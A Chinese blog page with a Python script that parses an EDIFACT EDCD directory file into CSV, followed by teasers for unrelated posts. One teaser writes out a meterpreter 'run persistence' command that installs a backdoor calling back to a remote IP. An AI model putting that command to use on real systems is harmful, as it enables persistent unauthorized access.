trcd_extract_EDCD

 # -*- coding:utf-8 -*-

 import re

 '''

 适应新版本

 '''

 year='17A'#用户自定义

 ss='./data/'#根目录

 filename = ss+'EDCD%s.txt'%year#输入文件名

 def trcd_nonote():

     p1 = r"^\s{4}(?:X|\W)\s{2}(C\d\d\d)\s.+\n"

     p2 = r"^\s{4}(?:X|\W)\s{2}C\d\d\d\s(.+)\n"

     p3 = r"^\s{7}Desc:\s(.+\.)\n"

     p4 = r"^\s{7}Desc:\s(.+[^\.])\n"

     p5 = r"^\s{13}(.+[^\.])\n"

     p6 = r"^\s{13}(.+\.)\n"

     pattern1 = re.compile(p1)

     pattern2 = re.compile(p2)

     pattern3 = re.compile(p3)

     pattern4 = re.compile(p4)

     pattern5 = re.compile(p5)

     pattern6 = re.compile(p6)

     fr = open(filename)

     temp = ();

     flag = 0

     for line in fr.readlines():

         matcher1 = re.findall(pattern1,line)

         matcher2 = re.findall(pattern2,line)

         matcher3 = re.findall(pattern3,line)

         matcher4 = re.findall(pattern4,line)

         matcher5 = re.findall(pattern5,line)

         matcher6 = re.findall(pattern6,line)

         #print matcher

         w2 = open(ss+'trcd_nonote%s.txt'%year,'a')#a代表追加 w代表重写

         if matcher1:

             flag = 1

             w2.write("\n")

             for j in matcher1:

                 for k in j:

                     w2.write(k)

                 #for k in g:

                     #w2.write(k)

             #continue;

         if ((matcher2!=[])and(flag ==1)):

             flag = 2

             #print type(tup1)

             #print tup1

             #flag = 2

             w2.write(",")

             for j in matcher2:

                 for k in j:

                     w2.write(k)

         if ((matcher3!=[])and(flag ==2)):

             flag = 3

             w2.write(",\"")

             for j in matcher3:

                 for k in j:

                     w2.write(k)

             w2.write("\"")

         if (matcher4!=[]):

             w2.write(",\"")

             for j in matcher4:

                 for k in j:

                     w2.write(k)

             flag = 4

         if ((matcher5!=[])and(flag ==4)):

             flag = 5

             w2.write(" ")

             for j in matcher5:

                 for k in j:

                     w2.write(k)

         if ((matcher6!=[])and(flag ==4 or 5)):

             flag = 6

             w2.write(" ")

             for j in matcher6:

                 for k in j:

                     w2.write(k)

             w2.write("\"")

     w2.close( )

 def trcd_note():

     p1 = r"^(?:\s{7}|X\s{6}|\W\s{6})([A-Z][0-9]{3})\s[A-Z].+$"#匹配1001

     p2 = r"^\s{7}Note:\s\n"#Note

     p3= r"^\s{13}([^ ].+)\n"#Note内容

     p4= r"^(?:-|컴)+\n"

     pattern1 = re.compile(p1)

     pattern2 = re.compile(p2)

     pattern3 = re.compile(p3)

     pattern4 = re.compile(p4)

     fr = open(filename)

     w2 = open(ss+'trcd_note%s.txt'%year,'a')#a代表追加 w代表重写

     # temp = ();

     flag = 0

     flag1=0

     for line in fr.readlines():

         matcher1 = re.findall(pattern1,line)

         matcher2 = re.findall(pattern2,line)

         matcher3 = re.findall(pattern3,line)

         matcher4 = re.findall(pattern4,line)

         #print matcher

         if matcher1!=[]:

             flag = 1

             w2.write("\n")

             # for j in matcher1:

             #     w2.write(j)

         if ((matcher2!=[])and(flag == 1)):

             flag = 2

             flag1=1

             # w2.write(",")

         if flag1==1:

             if ((matcher3!=[])and(flag ==2 or 3)):

                 flag = 3

                 w2.write(" ")

                 for j in matcher3:

                     w2.write(j)

             # w2.write(")

             if ((matcher4!=[])and(flag == 3)):

                 flag=0

                 flag1=0

     w2.write("\n")

     w2.close( )

     fr.close()

 def join():

     f1= open(ss+'trcd_note%s.txt'%year)

     f2 =open(ss+'trcd_nonote%s.txt'%year) 

     list_note=[]

     for line1 in f1:

         # print(line1)

         if line1.isspace():

             list_note.append('')

         else:

             list_note.append(line1)

     f1.close()

     # print(list_note)

     f2_w= open(ss+'trcd%s.csv'%year,'a')

     # for i in range(len(list_note)):

     i=0

         # f2_r = open(ss+'/new/%s_w.txt'%list_tag[i])

     for line2 in f2:

         str11="%s,\"%s\"\n"%(line2.strip('\n'),list_note[i].strip('\n'))

         i=i+1

         # print(i)

         # print(str11)

         f2_w.write(str11)

     f2_w.close()

     f2.close()

 if __name__ == '__main__':

     trcd_nonote()

     trcd_note()

     join()

trcd_extract_EDCD_new的更多相关文章

随机推荐

deb软件包安装和卸载
deb包是debian,ubuntu等LINUX发行版的软件安装包,是类似于rpm的软件包,而非debian,ubuntu系统不推荐使用deb软件包,因为要解决软件包依赖问题,安装也比较麻烦. 1.一 ...
C++的空指针、野指针和指针赋值NULL.md
1.空指针和野指针 http://blog.csdn.net/fu_zk/article/details/21030607 空指针常量一个表示0值的整数常量,叫做空指针常量.例如:0.0L.1-1( ...
ArcGIS 复制要素
DataManagementTools.General.Copy DataManagementTools.Features.CopyFeatures ConversionTools.ToGeodata ...
[故障引起的故事]URL中带加号的处理
问题起因: 客户订购了一关键字为"e+h 变送器" , 在首页推荐广告中,会根据用户在search 搜索过的关键字进行一个匹配投放.技术实现是UED 通过JS 获取coo ...
zg项目应用系统编码原则
一.编码说明: 1.系统编码采用三码为原则,通常两码简称之. 1>.子系统或类型 2>.系统小分类 3>.系统大分类如 IPMS领域业务群: DA 应用软件发展管理系统 DE公用副 ...
4、注解反射生成SQL语句
.任务说明 ①有一张用户表,字段包括:用户ID.用户名.昵称.年龄.性别.所在城市.邮箱.手机号: ②使用java注解来对用户表的每个字段或字段的组合条件进行动态生成S ...
MYSQL 备份及还原数据库
二.还原 1.NEW DB
Python property() 函数
Python property() 函数 Python 内置函数描述 property() 函数的作用是在新式类中返回属性值. 语法以下是 property() 方法的语法: class pro ...
Python3 ord() 函数
Python3 ord() 函数 Python3 内置函数描述 ord() 函数是 chr() 函数(对于 8 位的 ASCII 字符串)的配对函数,它以一个字符串(Unicode 字符)作为参数 ...
meterpreter 如何留后门，使攻击持久化
安装后门方法一:meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is 6 ...

trcd_extract_EDCD_new

trcd_extract_EDCD_new的更多相关文章

随机推荐

热门专题